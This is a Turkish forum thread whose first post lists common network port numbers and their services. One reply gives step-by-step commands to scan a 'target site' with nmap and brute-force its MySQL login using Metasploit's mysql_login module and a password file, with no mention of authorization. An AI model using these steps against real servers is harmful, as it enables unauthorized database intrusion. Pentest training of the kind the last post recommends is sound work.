En çok kullanılan portlar (1 Viewer)

Joined
Nov 8, 2018
Credits
4
Rating - 0%
Portlar ağdaki cihazların giriş/çıkış noktalarıdır. Port numaraları sistem yöneticilerinin ve güvenlik araştırmacılarının bilmesi gereken önemli konulardan bir tanesidir.

Örneğin; bir sistem yöneticisi internet sitesi bulunduran bir sunucuyu kurarken 80 numaralı portu sisteminde açması gerektiğini bilmelidir. Ayrıca domainleri IP adreslerine bağlayan isim sunucuları, yani DNS sunucuları için 53 numaralı portun açılması gerektiğini bilmelidir. Bu örnekler bu şekilde çoğalabilir.

Toplamda 65535 port numarası vardır. 0 ile 1024 arasındaki portlar en sık kullanılan uygulamalar içindir. 1024-49151 arasındaki port numaraları rezerve edilmiştir. Rezerve edilmişler dışında kalan portlar dinamik portlardır, özel kullanıma açıktır. Aşağıdaki listede en yaygın kullanılan port numaraları verilmiştir.

1 TCP Port Service Multiplexer (TCPMUX)
5 Remote Job Entry (RJE)
7 ECHO
18 Message Send Protocol (MSP)
20 FTP -- Data
21 FTP -- Control
22 SSH Remote Login Protocol
23 Telnet
25 Simple Mail Transfer Protocol (SMTP)
29 MSG ICP
37 Time
42 Host Name Server (Nameserv)
43 WhoIs
49 Login Host Protocol (Login)
53 Domain Name System (DNS)
69 Trivial File Transfer Protocol (TFTP)
70 Gopher Services
79 Finger
80 HTTP
103 X.400 Standard
108 SNA Gateway Access Server
109 POP2
110 POP3
115 Simple File Transfer Protocol (SFTP)
118 SQL Services
119 Newsgroup (NNTP)
137 NetBIOS Name Service
139 NetBIOS Datagram Service
143 Interim Mail Access Protocol (IMAP)
150 NetBIOS Session Service
156 SQL Server
161 SNMP
179 Border Gateway Protocol (BGP)
190 Gateway Access Control Protocol (GACP)
194 Internet Relay Chat (IRC)
197 Directory Location Service (DLS)
389 Lightweight Directory Access Protocol (LDAP)
396 Novell Netware over IP
443 HTTPS
444 Simple Network Paging Protocol (SNPP)
445 Microsoft-DS
458 Apple QuickTime
546 DHCP Client
547 DHCP Server
563 SNEWS
569 MSN
1080 Socks
 
Joined
Apr 30, 2019
Credits
0
Rating - 0%
şimdi altına yorumlar gelicek abi biz portları nerden bulucaz hedef site bilgi toplanır nmap la acık port bulunur (linux)
önce konsoldan versiyon taraması yapılır örn: nmap -sV 111.111.111.111 starting nmap yazısı cıktıgına göre port taraması başlamıştır genelde 3306 port acık olur bu şekilde cıkar (versiyon)3306/tcp open mysql MySQL 5.0.51a-3UBUNTU5 (burdan sızma testi gercekleşir) konsolu kapatmadan yeni konsol acın

use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) show options

msf auxiliary(mysql_login)> set RHOST 111.111.111.111
RHOST>111.111.111.111
msf auxiliary(mysql_login) > set USERPASS_FILE /root/Desktop/
deneme yanılma yöntemiyle gercekleşir
msf auxiliary(mysql_login)exploit saldırın
bunun icinde sunucunun uzak bağlantı sistemi aktif olmalı ve bilgiler default olmalı buda MySQL veritabanı sızma ve uzak MySQL bağlantısı adı verilir
metasploit ile anlattım metasploiti uzun uzun anlatamam
 
Joined
Apr 30, 2019
Credits
0
Rating - 0%
BGA nın cok güzel pentest egitimleri var onları öğrenmeden giremyin bunlara
sonucta girdiğinizde nelerle karşılacagınızı neler yapacagınızı bilmiyorsunuz
 

Users who are viewing this thread

Top